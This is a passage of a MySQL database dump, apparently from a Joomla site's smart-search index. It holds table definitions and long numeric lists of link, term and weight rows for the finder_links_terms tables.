(306, 328500, 0.81669),
(306, 328501, 1.07331),
(306, 328502, 0.95669),
(306, 328503, 0.98),
(306, 328504, 0.86331),
(306, 328505, 1.00331),
(306, 328506, 0.98),
(306, 328507, 1.07331),
(306, 328508, 0.98),
(306, 328509, 1.77338),
(306, 328510, 0.95669),
(306, 328511, 1.05),
(306, 328512, 1.09669),
(306, 328513, 1.00331),
(306, 328514, 0.91),
(306, 328515, 0.86331),
(306, 328516, 0.98),
(306, 328517, 0.95669),
(306, 328518, 2.00662),
(306, 328519, 0.95669),
(306, 328520, 1.00331),
(306, 328521, 0.88669),
(306, 328522, 0.95669),
(306, 328523, 1.05),
(306, 328524, 0.98),
(306, 328525, 1.02669),
(306, 328526, 0.95669),
(306, 328527, 0.93331),
(306, 328528, 0.88669),
(306, 328529, 0.95669),
(306, 328530, 1.05),
(306, 328531, 0.95669),
(306, 328532, 1.05),
(306, 328533, 1.02669),
(306, 328534, 1.02669),
(306, 328535, 1.05),
(306, 328536, 1.26),
(306, 328537, 1.02669),
(306, 328538, 1.12),
(306, 328539, 1.12),
(306, 328540, 1.16669),
(306, 328541, 1.12),
(306, 328542, 1.12),
(306, 328543, 1.30669),
(306, 328544, 0.91),
(306, 328545, 1.09669),
(306, 328546, 0.95669),
(306, 328547, 1.05),
(306, 328548, 1.05),
(306, 328549, 2.73),
(306, 328550, 1.00331),
(306, 328551, 0.98),
(306, 328552, 1.12),
(306, 328553, 1.07331),
(306, 328554, 1.07331),
(306, 328555, 2.00662),
(306, 328556, 0.95669),
(306, 328557, 1.07331),
(306, 328558, 0.91),
(306, 328559, 1.02669),
(306, 328560, 0.88669),
(306, 328561, 1.23669),
(306, 328562, 1.07331),
(306, 328563, 1.02669),
(306, 328564, 1.19),
(306, 328565, 1.09669),
(306, 328566, 1.19),
(306, 328567, 1.12),
(306, 328568, 0.91),
(306, 328569, 1.00331),
(306, 328570, 0.93331),
(306, 328571, 1.09669),
(306, 328572, 1.12),
(306, 328573, 1.09669),
(306, 328574, 1.02669),
(306, 328575, 1.09669),
(308, 328922, 1.02669),
(308, 328923, 1.14331),
(308, 328924, 1.21331),
(308, 328949, 1.09669),
(308, 328950, 1.37669),
(308, 328956, 1.16669),
(308, 328957, 1.26);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_terms5`
--

CREATE TABLE `y57u5_finder_links_terms5` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_terms5`
--

INSERT INTO `y57u5_finder_links_terms5` (`link_id`, `term_id`, `weight`) VALUES
(178, 221029, 0.28),
(178, 221030, 0.81669),
(178, 221031, 0.93331),
(178, 221032, 0.86331),
(178, 221033, 1.00331),
(178, 221034, 0.09331),
(264, 221034, 0.09331),
(292, 221034, 0.09331),
(305, 221034, 0.09331),
(178, 221035, 0.84),
(178, 221036, 0.88669),
(264, 300333, 0.86331),
(264, 300334, 0.98),
(292, 317330, 0.84),
(292, 317331, 0.91),
(305, 325809, 0.79331),
(305, 325810, 0.93331);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_terms6`
--

CREATE TABLE `y57u5_finder_links_terms6` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_terms6`
--

INSERT INTO `y57u5_finder_links_terms6` (`link_id`, `term_id`, `weight`) VALUES
(31, 317, 0.18669),
(160, 317, 0.18669),
(236, 317, 0.18669),
(240, 317, 0.18669),
(242, 317, 0.18669),
(247, 317, 0.18669),
(249, 317, 0.18669),
(250, 317, 0.18669),
(251, 317, 0.18669),
(252, 317, 0.18669),
(255, 317, 0.18669),
(261, 317, 0.18669),
(262, 317, 0.18669),
(264, 317, 0.18669),
(265, 317, 0.18669),
(266, 317, 0.18669),
(267, 317, 0.18669),
(268, 317, 0.18669),
(272, 317, 0.18669),
(274, 317, 0.18669),
(280, 317, 0.18669),
(292, 317, 0.18669),
(306, 317, 0.18669),
(168, 317, 0.37338),
(174, 317, 0.37338),
(178, 317, 0.37338),
(243, 317, 0.37338),
(248, 317, 0.37338),
(259, 317, 0.37338),
(260, 317, 0.37338),
(270, 317, 0.37338),
(288, 317, 0.37338),
(301, 317, 0.37338),
(305, 317, 0.56007),
(299, 317, 0.74676),
(193, 317, 1.12014),
(159, 317, 1.70688),
(31, 318, 0.91),
(160, 318, 0.91),
(250, 318, 0.91),
(251, 318, 0.91),
(159, 318, 8.32),
(31, 319, 1.00331),
(159, 319, 1.00331),
(160, 319, 1.00331),
(250, 319, 1.00331),
(251, 319, 1.00331),
(31, 321, 0.14),
(193, 321, 0.14),
(235, 321, 0.14),
(238, 321, 0.14),
(240, 321, 0.14),
(247, 321, 0.14),
(249, 321, 0.14),
(250, 321, 0.14),
(251, 321, 0.14),
(257, 321, 0.14),
(259, 321, 0.14),
(260, 321, 0.14),
(272, 321, 0.14),
(274, 321, 0.14),
(280, 321, 0.14),
(299, 321, 0.14),
(174, 321, 0.28),
(178, 321, 0.28),
(243, 321, 0.28),
(252, 321, 0.28),
(304, 321, 0.28),
(244, 321, 0.42),
(245, 321, 0.42),
(256, 321, 0.42),
(273, 321, 0.42),
(306, 321, 0.42),
(31, 322, 0.88669),
(250, 322, 0.88669),
(251, 322, 0.88669),
(31, 323, 1.05),
(250, 323, 1.05),
(251, 323, 1.05),
(31, 324, 0.46669),
(159, 324, 0.46669),
(160, 324, 0.46669),
(250, 324, 0.46669),
(251, 324, 0.46669),
(31, 325, 1.02669),
(159, 325, 1.02669),
(160, 325, 1.02669),
(250, 325, 1.02669),
(251, 325, 1.02669),
(31, 326, 1.14331),
(159, 326, 1.14331),
(160, 326, 1.14331),
(250, 326, 1.14331),
(251, 326, 1.14331),
(304, 327, 0.02331),
(241, 327, 0.18669),
(247, 327, 0.18669),
(249, 327, 0.18669),
(252, 327, 0.18669),
(257, 327, 0.18669),
(259, 327, 0.18669),
(260, 327, 0.18669),
(262, 327, 0.18669),
(269, 327, 0.18669),
(272, 327, 0.18669),
(275, 327, 0.18669),
(280, 327, 0.18669),
(288, 327, 0.18669),
(240, 327, 0.37338),
(31, 327, 0.56007),
(159, 327, 0.56007),
(160, 327, 0.56007),
(239, 327, 0.56007),
(250, 327, 0.56007),
(251, 327, 0.56007),
(31, 328, 1.02669),
(159, 328, 1.02669),
(160, 328, 1.02669),
(250, 328, 1.02669),
(251, 328, 1.02669),
(31, 329, 1.09669),
(159, 329, 1.09669),
(160, 329, 1.09669),
(250, 329, 1.09669),
(251, 329, 1.09669),
(31, 330, 1.07331),
(159, 330, 1.07331),
(160, 330, 1.07331),
(250, 330, 1.07331),
(251, 330, 1.07331),
(31, 331, 1.19),
(159, 331, 1.19),
(160, 331, 1.19),
(250, 331, 1.19),
(251, 331, 1.19),
(31, 332, 0.95669),
(159, 332, 0.95669),
(160, 332, 0.95669),
(250, 332, 0.95669),
(251, 332, 0.95669),
(31, 333, 1.05),
(159, 333, 1.05),
(160, 333, 1.05),
(250, 333, 1.05),
(251, 333, 1.05),
(31, 334, 0.32669),
(159, 334, 0.32669),
(160, 334, 0.32669),
(250, 334, 0.32669),
(251, 334, 0.32669),
(31, 335, 1.02669),
(159, 335, 1.02669),
(160, 335, 1.02669),
(250, 335, 1.02669),
(251, 335, 1.02669),
(31, 336, 1.16669),
(159, 336, 1.16669),
(160, 336, 1.16669),
(250, 336, 1.16669),
(251, 336, 1.16669),
(305, 337, 0.06993),
(301, 337, 0.09324),
(31, 337, 0.18669),
(159, 337, 0.18669),
(160, 337, 0.18669),
(193, 337, 0.18669),
(241, 337, 0.18669),
(246, 337, 0.18669),
(249, 337, 0.18669),
(250, 337, 0.18669),
(251, 337, 0.18669),
(253, 337, 0.18669),
(258, 337, 0.18669),
(265, 337, 0.18669),
(266, 337, 0.18669),
(267, 337, 0.18669),
(275, 337, 0.18669),
(292, 337, 0.18669),
(255, 337, 0.37338),
(257, 337, 0.37338),
(259, 337, 0.37338),
(260, 337, 0.37338),
(269, 337, 0.37338),
(288, 337, 0.37338),
(290, 337, 0.37338),
(174, 337, 0.56007),
(235, 337, 0.56007),
(237, 337, 0.56007),
(238, 337, 0.56007),
(256, 337, 0.56007),
(261, 337, 0.56007),
(263, 337, 0.56007),
(244, 337, 0.74676),
(252, 337, 0.74676),
(262, 337, 0.74676),
(270, 337, 0.74676),
(306, 337, 0.74676),
(254, 337, 0.93345),
(239, 337, 1.8669),
(240, 337, 1.8669),
(243, 337, 1.89357),
(242, 337, 2.05359),
(31, 338, 0.88669),
(159, 338, 0.88669),
(160, 338, 0.88669),
(250, 338, 0.88669),
(251, 338, 0.88669),
(31, 339, 0.95669),
(159, 339, 0.95669),
(160, 339, 0.95669),
(250, 339, 0.95669),
(251, 339, 0.95669),
(159, 1083, 0.18669),
(160, 1083, 0.18669),
(235, 1083, 0.18669),
(244, 1083, 0.18669),
(264, 1083, 0.18669),
(265, 1083, 0.18669),
(266, 1083, 0.18669),
(268, 1083, 0.18669),
(305, 1083, 0.18669),
(262, 1083, 0.37338),
(299, 1083, 0.37338),
(242, 1083, 0.56007),
(306, 1083, 0.56007),
(178, 1083, 0.93345),
(253, 1083, 1.52019),
(159, 1084, 0.84),
(160, 1084, 0.84),
(178, 1084, 0.84),
(305, 1084, 0.84),
(159, 1085, 1.00331),
(160, 1085, 1.00331),
(159, 1087, 0.18669),
(160, 1087, 0.18669),
(240, 1087, 0.18669),
(242, 1087, 0.18669),
(248, 1087, 0.18669),
(249, 1087, 0.18669),
(253, 1087, 0.18669),
(270, 1087, 0.18669),
(272, 1087, 0.18669),
(280, 1087, 0.18669),
(298, 1087, 0.18669),
(301, 1087, 0.18669),
(308, 1087, 0.18669),
(268, 1087, 0.37338),
(274, 1087, 0.37338),
(159, 1088, 0.86331),
(160, 1088, 0.86331),
(159, 1089, 0.95669),
(160, 1089, 0.95669),
(159, 1090, 0.28),
(160, 1090, 0.28),
(236, 1090, 0.28),
(241, 1090, 0.28),
(159, 1091, 0.98),
(160, 1091, 0.98),
(159, 1092, 1.05),
(160, 1092, 1.05),
(161, 1528, 0.23331),
(178, 1528, 0.23331),
(235, 1528, 0.23331),
(237, 1528, 0.23331),
(238, 1528, 0.23331),
(254, 1528, 0.23331),
(258, 1528, 0.23331),
(259, 1528, 0.23331),
(260, 1528, 0.23331),
(306, 1528, 0.23331),
(304, 1528, 0.46662),
(267, 1528, 0.69993),
(272, 1528, 1.39986),
(280, 1528, 1.39986),
(161, 1531, 0.28),
(242, 1531, 0.28),
(254, 1531, 0.28),
(267, 1531, 0.28),
(288, 1531, 0.28),
(306, 1531, 0.28),
(255, 1531, 0.56),
(298, 1543, 0.02331),
(304, 1543, 0.02331),
(168, 1543, 0.18669),
(174, 1543, 0.18669),
(238, 1543, 0.18669),
(239, 1543, 0.18669),
(247, 1543, 0.18669),
(275, 1543, 0.18669),
(292, 1543, 0.18669),
(308, 1543, 0.18669),
(178, 1543, 0.37338),
(235, 1543, 0.37338),
(241, 1543, 0.37338),
(258, 1543, 0.37338),
(288, 1543, 0.37338),
(306, 1543, 0.37338),
(161, 1543, 0.56007),
(240, 1543, 0.56007),
(242, 1543, 0.56007),
(262, 1543, 0.56007),
(193, 1543, 0.74676),
(268, 1543, 0.93345),
(245, 1543, 1.30683),
(243, 1551, 0.18669),
(244, 1551, 0.18669),
(249, 1551, 0.18669),
(258, 1551, 0.18669),
(263, 1551, 0.18669),
(268, 1551, 0.18669),
(299, 1551, 0.18669),
(235, 1551, 0.37338),
(242, 1551, 0.37338),
(259, 1551, 0.37338),
(260, 1551, 0.37338),
(161, 1551, 0.56007),
(242, 1552, 0.91),
(161, 1552, 1.82),
(235, 1552, 1.82),
(168, 1559, 0.37331),
(161, 1559, 0.74662),
(193, 1559, 0.74662),
(240, 10362, 0.23331),
(250, 10362, 1.89981),
(174, 11558, 0.37331),
(257, 11558, 0.37331),
(273, 11558, 0.37331),
(295, 11558, 0.37331),
(31, 11558, 1.70656),
(31, 11559, 2.8666),
(31, 11560, 3),
(174, 13014, 0.18669),
(193, 13014, 0.18669),
(241, 13014, 0.18669),
(242, 13014, 0.18669),
(244, 13014, 0.18669),
(245, 13014, 0.18669),
(252, 13014, 0.18669),
(258, 13014, 0.18669),
(262, 13014, 0.18669),
(264, 13014, 0.18669),
(268, 13014, 0.18669),
(269, 13014, 0.18669),
(270, 13014, 0.18669),
(274, 13014, 0.18669),
(292, 13014, 0.18669),
(301, 13014, 0.18669),
(305, 13014, 0.18669),
(239, 13014, 0.37338),
(243, 13014, 0.37338),
(299, 13014, 0.37338),
(240, 13014, 0.56007),
(257, 13014, 0.56007),
(174, 13015, 0.93331),
(242, 13015, 0.93331),
(252, 13015, 0.93331),
(252, 13017, 0.28),
(272, 13017, 0.28),
(280, 13017, 0.28),
(174, 13022, 0.86331),
(193, 13022, 0.86331),
(238, 13022, 0.86331),
(245, 13022, 0.86331),
(252, 13022, 0.86331),
(259, 13022, 0.86331),
(260, 13022, 0.86331),
(256, 13022, 1.72662),
(252, 13024, 0.37331),
(256, 13024, 0.37331),
(263, 13024, 0.37331),
(193, 13031, 0.86331),
(255, 13031, 0.86331),
(256, 13031, 0.86331),
(263, 13031, 0.86331),
(306, 13031, 0.86331),
(240, 13031, 1.72662),
(242, 13031, 1.72662),
(243, 13031, 1.72662),
(252, 13031, 1.72662),
(262, 13031, 1.72662),
(238, 13031, 2.58993),
(239, 13031, 4.31655),
(239, 21142, 0.37331),
(240, 21142, 0.37331),
(274, 21142, 0.37331),
(295, 21142, 0.37331),
(304, 21142, 0.37331),
(306, 21142, 0.37331),
(308, 21142, 0.37331),
(288, 21142, 0.74662),
(233, 21142, 1.11993),
(233, 21145, 0.95669),
(240, 21145, 0.95669),
(304, 21145, 0.95669),
(233, 21150, 0.18669),
(239, 21150, 0.18669),
(244, 21150, 0.18669),
(245, 21150, 0.18669),
(248, 21150, 0.18669),
(253, 21150, 0.18669),
(262, 21150, 0.18669),
(305, 21150, 0.18669),
(168, 21150, 0.56007),
(256, 21150, 0.93345),
(235, 23652, 0.23331),
(238, 23652, 0.23331),
(239, 23652, 0.23331),
(243, 23652, 0.23331),
(299, 23652, 0.23331),
(240, 23655, 0.84),
(248, 23655, 0.84),
(299, 23655, 0.84),
(305, 23655, 0.84),
(193, 23659, 1.82),
(299, 23659, 1.82),
(245, 23665, 0.14),
(249, 23665, 0.14),
(270, 23665, 0.14),
(273, 23665, 0.14),
(274, 23665, 0.14),
(287, 23665, 0.14),
(288, 23665, 0.14),
(290, 23665, 0.14),
(301, 23665, 0.14),
(193, 23665, 0.28),
(237, 23665, 0.28),
(243, 23665, 0.28),
(253, 23665, 0.28),
(257, 23665, 0.28),
(261, 23665, 0.28),
(178, 23665, 0.42),
(240, 23665, 0.42),
(248, 23665, 0.42),
(258, 23665, 0.42),
(242, 23665, 0.56),
(263, 23665, 0.56),
(292, 23665, 0.56),
(299, 23665, 0.56),
(305, 23665, 0.56),
(247, 23665, 0.7),
(254, 23665, 0.7),
(267, 23665, 0.7),
(272, 23665, 0.7),
(280, 23665, 0.7),
(304, 23665, 0.7),
(262, 23665, 2.1),
(254, 23670, 0.86331),
(261, 23670, 0.86331),
(299, 23670, 0.86331),
(304, 23670, 0.86331),
(305, 23670, 0.86331),
(235, 23678, 0.84),
(247, 23678, 0.84),
(274, 23678, 0.84),
(299, 23678, 0.84),
(306, 23678, 0.84),
(244, 23678, 1.68),
(244, 23679, 1.02669),
(299, 23679, 1.02669),
(305, 23680, 0.01169),
(299, 23680, 0.08183),
(239, 23680, 0.09331),
(240, 23680, 0.09331),
(243, 23680, 0.09331),
(244, 23680, 0.09331),
(256, 23680, 0.09331),
(257, 23680, 0.09331),
(258, 23680, 0.09331),
(261, 23680, 0.09331),
(268, 23680, 0.09331),
(273, 23680, 0.09331),
(275, 23680, 0.09331),
(254, 23680, 0.18662),
(255, 23680, 0.18662),
(290, 23680, 0.18662),
(306, 23680, 0.55986),
(292, 23680, 0.65317),
(178, 23680, 0.9331),
(299, 23685, 0.81669),
(178, 23685, 2.45007),
(299, 23686, 0.95669),
(178, 23686, 1.91338),
(261, 23689, 0.81669),
(273, 23689, 0.81669),
(275, 23689, 0.81669),
(292, 23689, 0.81669),
(299, 23689, 0.81669),
(305, 23689, 0.81669),
(306, 23689, 0.81669),
(273, 23690, 0.88669),
(299, 23690, 0.88669),
(305, 23690, 0.88669),
(306, 23690, 0.88669),
(237, 23698, 0.14),
(238, 23698, 0.14),
(239, 23698, 0.14),
(244, 23698, 0.14),
(265, 23698, 0.14),
(266, 23698, 0.14),
(270, 23698, 0.14),
(301, 23698, 0.14),
(306, 23698, 0.14),
(241, 23698, 0.28),
(254, 23698, 0.28),
(258, 23698, 0.28),
(261, 23698, 0.28),
(262, 23698, 0.28),
(263, 23698, 0.28),
(273, 23698, 0.28),
(290, 23698, 0.28),
(299, 23698, 0.28),
(287, 23698, 0.34),
(240, 23698, 0.42),
(242, 23698, 0.42),
(253, 23698, 0.42),
(288, 23698, 0.42),
(292, 23698, 0.42),
(299, 23699, 0.84),
(240, 23699, 2.52),
(288, 23699, 2.52),
(254, 23703, 0.23331),
(259, 23703, 0.23331),
(260, 23703, 0.23331),
(272, 23703, 0.23331),
(280, 23703, 0.23331),
(299, 23703, 0.23331),
(235, 23703, 0.46662),
(254, 23704, 0.88669),
(299, 23704, 0.88669),
(193, 23706, 0.23331),
(239, 23706, 0.23331),
(240, 23706, 0.23331),
(247, 23706, 0.23331),
(249, 23706, 0.23331),
(257, 23706, 0.23331),
(299, 23706, 0.23331),
(306, 23706, 0.46662),
(245, 23706, 0.69993),
(178, 23709, 0.23331),
(242, 23709, 0.23331),
(243, 23709, 0.23331),
(247, 23709, 0.23331),
(257, 23709, 0.23331),
(262, 23709, 0.23331),
(265, 23709, 0.23331),
(266, 23709, 0.23331),
(267, 23709, 0.23331),
(244, 23709, 0.46662),
(256, 23709, 0.46662),
(299, 23709, 0.69993),
(255, 23709, 1.16655),
(305, 23718, 0.01169),
(299, 23718, 0.07014),
(239, 23718, 0.09331),
(241, 23718, 0.09331),
(244, 23718, 0.09331),
(257, 23718, 0.09331),
(258, 23718, 0.09331),
(269, 23718, 0.09331),
(290, 23718, 0.09331),
(255, 23718, 0.18662),
(275, 23718, 0.18662),
(256, 23718, 0.27993),
(268, 23718, 0.27993),
(292, 23718, 0.37324),
(306, 23718, 0.74648),
(178, 23718, 2.89261),
(255, 25198, 0.37331),
(298, 25198, 0.37331),
(308, 25198, 0.37331),
(304, 25198, 0.74662),
(242, 25201, 0.37331),
(267, 25201, 0.37331),
(298, 25201, 0.37331),
(308, 25201, 0.37331),
(239, 25201, 0.74662),
(242, 25202, 0.95669),
(298, 25202, 0.95669),
(308, 25202, 0.95669),
(239, 25202, 1.91338),
(242, 25203, 1.21331),
(298, 25203, 1.21331),
(308, 25203, 1.21331),
(239, 25203, 2.42662),
(168, 25204, 0.28),
(298, 25204, 0.28),
(305, 25204, 0.28),
(308, 25204, 0.28),
(239, 25207, 0.28),
(246, 25207, 0.28),
(248, 25207, 0.28),
(253, 25207, 0.28),
(254, 25207, 0.28),
(261, 25207, 0.28),
(263, 25207, 0.28),
(265, 25207, 0.28),
(266, 25207, 0.28),
(267, 25207, 0.28),
(298, 25207, 0.28),
(308, 25207, 0.28),
(240, 25207, 0.56),
(249, 25207, 0.56),
(268, 25207, 1.96),
(298, 25210, 0.23331),
(308, 25210, 0.23331),
(50, 25210, 0.56661),
(248, 25218, 0.37331),
(253, 25218, 0.37331),
(258, 25218, 0.37331),
(292, 25218, 0.37331),
(298, 25218, 0.37331),
(308, 25218, 0.37331),
(275, 25218, 0.74662),
(45, 25218, 0.90661),
(306, 25218, 1.49324),
(261, 25218, 2.23986),
(239, 25221, 0.91),
(288, 25221, 0.91),
(298, 25221, 0.91),
(308, 25221, 0.91),
(50, 26070, 2.60661),
(193, 32274, 0.84),
(248, 32274, 0.84),
(254, 32274, 0.84),
(273, 32274, 0.84),
(253, 36756, 0.86331),
(240, 36756, 1.72662),
(236, 36760, 0.18669),
(238, 36760, 0.18669),
(240, 36760, 0.18669),
(243, 36760, 0.18669),
(253, 36760, 0.18669),
(254, 36760, 0.18669),
(288, 36760, 0.18669),
(239, 36760, 0.37338),
(248, 36763, 0.93331),
(253, 36763, 0.93331),
(254, 36763, 0.93331),
(261, 36763, 0.93331),
(263, 36763, 0.93331),
(240, 36765, 0.18669),
(248, 36765, 0.18669),
(253, 36765, 0.18669),
(268, 36765, 0.37338),
(236, 36768, 0.23331),
(237, 36768, 0.23331),
(239, 36768, 0.23331),
(240, 36768, 0.23331),
(253, 36768, 0.23331),
(264, 36768, 0.23331),
(268, 36768, 0.23331),
(305, 36768, 0.23331),
(306, 36768, 0.23331),
(246, 36768, 0.46662),
(269, 36768, 0.46662),
(272, 36768, 0.69993),
(280, 36768, 0.69993),
(242, 36768, 1.16655),
(253, 36769, 0.88669),
(272, 36769, 0.88669),
(280, 36769, 0.88669),
(305, 36769, 0.88669),
(242, 36769, 2.66007),
(178, 36775, 0.23331),
(253, 36775, 0.23331),
(178, 36776, 0.88669),
(253, 36776, 0.88669),
(243, 36778, 0.28),
(253, 36778, 0.28),
(239, 36785, 0.91),
(253, 36785, 0.91),
(235, 51185, 0.91),
(237, 51185, 0.91),
(238, 51185, 0.91),
(259, 51185, 0.91),
(260, 51185, 0.91),
(304, 51185, 0.91),
(272, 51185, 4.55),
(280, 51185, 4.55),
(235, 51188, 0.28),
(239, 51188, 0.28),
(249, 51188, 0.28),
(235, 51207, 0.93331),
(240, 51207, 0.93331),
(193, 64988, 0.88669),
(243, 64988, 0.88669),
(247, 64988, 0.88669),
(265, 64988, 0.88669),
(266, 64988, 0.88669),
(268, 64988, 0.88669),
(288, 64988, 0.88669),
(259, 64988, 1.77338),
(260, 64988, 1.77338),
(193, 64990, 0.84),
(237, 64990, 0.84),
(262, 64990, 0.84),
(272, 64990, 0.84),
(274, 64990, 0.84),
(280, 64990, 0.84),
(193, 64999, 0.32669),
(237, 64999, 0.32669),
(246, 64999, 0.32669),
(247, 75805, 0.84),
(272, 75805, 0.84),
(280, 75805, 0.84),
(305, 75805, 0.84),
(254, 75805, 1.68),
(262, 75805, 1.68),
(254, 75819, 0.88669),
(262, 75819, 0.88669),
(254, 75828, 0.42),
(256, 75828, 0.42),
(242, 75831, 0.93331),
(292, 75831, 0.93331),
(254, 75831, 1.86662),
(254, 75834, 0.91),
(239, 75834, 1.82),
(236, 77907, 0.14),
(243, 77907, 0.14),
(273, 77907, 0.14),
(236, 77908, 0.84),
(243, 77908, 0.84),
(236, 77913, 0.32669),
(246, 77913, 0.32669),
(236, 77916, 0.32669),
(239, 77916, 0.32669),
(240, 77916, 0.32669),
(243, 77916, 0.32669),
(262, 77916, 0.32669),
(268, 77916, 0.32669),
(242, 77916, 0.65338),
(238, 77916, 0.98007),
(236, 77917, 0.93331),
(243, 77917, 0.93331),
(174, 77924, 0.18669),
(236, 77924, 0.18669),
(239, 77924, 0.18669),
(241, 77924, 0.18669),
(261, 77924, 0.18669),
(275, 77924, 0.18669),
(236, 77927, 0.32669),
(243, 77927, 0.32669),
(237, 84764, 0.88669),
(263, 84764, 0.88669),
(258, 84766, 0.32669),
(237, 84766, 0.65338),
(237, 84773, 0.91),
(240, 84773, 0.91),
(261, 84773, 0.91),
(262, 84773, 0.91),
(243, 84773, 7.41),
(237, 84775, 1.05),
(262, 84775, 1.05),
(263, 84775, 1.05),
(275, 84775, 1.05),
(237, 84776, 1.16669),
(262, 84776, 1.16669),
(275, 84776, 1.16669),
(238, 92414, 0.37331),
(243, 92414, 0.37331),
(238, 92421, 0.95669),
(259, 92421, 0.95669),
(260, 92421, 0.95669),
(240, 92422, 0.46669),
(238, 92422, 0.93338),
(239, 100660, 0.84),
(264, 100660, 0.84),
(239, 100664, 0.86331),
(240, 100664, 0.86331),
(239, 100665, 1.00331),
(240, 100665, 1.00331),
(239, 100673, 0.93331),
(240, 100673, 0.93331),
(239, 100674, 1.07331),
(240, 100674, 1.07331),
(239, 100680, 0.91),
(242, 100680, 0.91),
(268, 100680, 0.91),
(269, 100680, 0.91),
(306, 100680, 0.91),
(239, 100693, 0.37331),
(273, 100693, 1.11993),
(239, 100699, 0.90661),
(242, 100699, 0.90661),
(240, 100699, 1.27992),
(239, 100700, 2.43661),
(240, 100700, 2.43661),
(242, 100700, 2.43661),
(240, 100708, 1.05),
(239, 100708, 3.15),
(239, 100709, 1.14331),
(240, 100709, 1.14331),
(240, 100713, 0.98),
(306, 100713, 0.98),
(239, 100713, 3.92),
(239, 100715, 0.95669),
(259, 100715, 0.95669),
(260, 100715, 0.95669),
(239, 100716, 1.00331),
(259, 100716, 1.00331),
(260, 100716, 1.00331),
(239, 100720, 0.88669),
(249, 100720, 0.88669),
(270, 100720, 0.88669),
(301, 100720, 0.88669),
(178, 102107, 0.37331),
(262, 102107, 0.37331),
(255, 102107, 0.74662),
(255, 102108, 0.95669),
(262, 102108, 0.95669),
(255, 102129, 0.86331),
(258, 102129, 0.86331),
(255, 102130, 0.98),
(258, 102130, 0.98),
(242, 110361, 0.84),
(257, 110361, 0.84),
(262, 110361, 0.84),
(292, 110361, 0.84),
(241, 110363, 0.95669),
(245, 110363, 0.95669),
(257, 110363, 0.95669),
(292, 110363, 0.95669),
(240, 110370, 0.86331),
(257, 110370, 0.86331),
(272, 110370, 0.86331),
(273, 110370, 0.86331),
(280, 110370, 0.86331),
(306, 110370, 0.86331),
(257, 110372, 0.86331),
(178, 110372, 1.72662),
(178, 110373, 0.95669),
(257, 110373, 0.95669),
(245, 110374, 0.32669),
(257, 110374, 0.32669),
(248, 110374, 0.65338),
(247, 110377, 0.91),
(257, 110377, 0.91),
(240, 110379, 0.32669),
(257, 110379, 0.32669),
(288, 110379, 0.65338),
(178, 110379, 0.98007),
(257, 110384, 0.88669),
(267, 110384, 0.88669),
(174, 110386, 0.91),
(244, 110386, 0.91),
(257, 110386, 0.91),
(306, 110386, 1.82),
(240, 114056, 0.86331),
(241, 114056, 0.86331),
(259, 114056, 0.86331),
(260, 114056, 0.86331),
(288, 114056, 0.86331),
(245, 115306, 0.93331),
(256, 115306, 0.93331),
(248, 115320, 0.91),
(256, 115320, 2.73),
(256, 115330, 0.23331),
(275, 115330, 0.23331),
(240, 147607, 0.95669),
(246, 147607, 0.95669),
(265, 147607, 0.95669),
(266, 147607, 0.95669),
(240, 147612, 0.84),
(243, 147612, 0.84),
(240, 147613, 0.93331),
(243, 147613, 0.93331),
(168, 147637, 0.88669),
(178, 147637, 0.88669),
(240, 147637, 0.88669),
(245, 147637, 0.88669),
(174, 147647, 1.00331),
(240, 147647, 2.00662),
(242, 149853, 0.86331),
(258, 149853, 0.86331),
(267, 149853, 0.86331),
(242, 149888, 0.28),
(258, 149888, 0.56),
(273, 149888, 0.56),
(174, 149912, 0.28),
(242, 149912, 0.28),
(258, 149912, 0.28),
(263, 149912, 0.28),
(274, 149912, 0.28),
(242, 149913, 0.93331),
(258, 149913, 0.93331),
(258, 149924, 0.91),
(262, 149924, 0.91),
(268, 149924, 1.82),
(243, 157532, 0.91),
(270, 157532, 0.91),
(301, 157532, 0.91),
(243, 157535, 0.88669),
(267, 157535, 0.88669),
(243, 157561, 0.86331),
(258, 157561, 0.86331),
(241, 159412, 0.88669),
(261, 159412, 0.88669),
(241, 159414, 0.86331),
(258, 159414, 0.86331),
(261, 159414, 0.86331),
(241, 159416, 0.88669),
(263, 159416, 0.88669),
(241, 159418, 0.18669),
(263, 159418, 1.12014),
(258, 163400, 0.88669),
(263, 163400, 0.88669),
(304, 163400, 1.77338),
(258, 163404, 0.93331),
(273, 163404, 0.93331),
(242, 169267, 0.88669),
(268, 169267, 0.88669),
(306, 169267, 0.88669),
(242, 169282, 0.86331),
(262, 169282, 0.86331),
(292, 169282, 0.86331),
(248, 169284, 0.28),
(242, 169284, 0.84),
(273, 169304, 0.18669),
(306, 169304, 0.18669),
(242, 169304, 0.93345),
(242, 169316, 0.32669),
(272, 169316, 0.32669),
(280, 169316, 0.32669),
(268, 169316, 0.98007),
(242, 169342, 0.23331),
(272, 169342, 0.23331),
(280, 169342, 0.23331),
(259, 173631, 1.00331),
(260, 173631, 1.00331),
(259, 173632, 1.02669),
(260, 173632, 1.02669),
(259, 173633, 1.05),
(260, 173633, 1.05),
(259, 173634, 0.91),
(260, 173634, 0.91),
(259, 173635, 0.98),
(260, 173635, 0.98),
(259, 173636, 0.98),
(260, 173636, 0.98),
(259, 173637, 0.88669),
(260, 173637, 0.88669),
(259, 173638, 0.98),
(260, 173638, 0.98),
(259, 173639, 1.00331),
(260, 173639, 1.00331),
(259, 173640, 1.12),
(260, 173640, 1.12),
(259, 173641, 1.02669),
(260, 173641, 1.02669),
(259, 173642, 1.23669),
(260, 173642, 1.23669),
(168, 175852, 0.88669),
(261, 175852, 0.88669),
(168, 175853, 0.98),
(261, 175853, 0.98),
(248, 175855, 0.84),
(261, 175855, 0.84),
(246, 175857, 0.65331),
(261, 175857, 0.65331),
(261, 175869, 0.98),
(275, 175869, 0.98),
(244, 176891, 0.91),
(265, 176891, 0.91),
(266, 176891, 0.91),
(244, 176896, 0.86331),
(273, 176896, 0.86331),
(244, 176897, 0.98),
(273, 176897, 0.98),
(168, 176905, 0.23331),
(244, 176905, 0.23331),
(262, 176908, 0.88669),
(244, 176908, 1.77338),
(247, 178741, 0.37331),
(245, 178741, 3.41312),
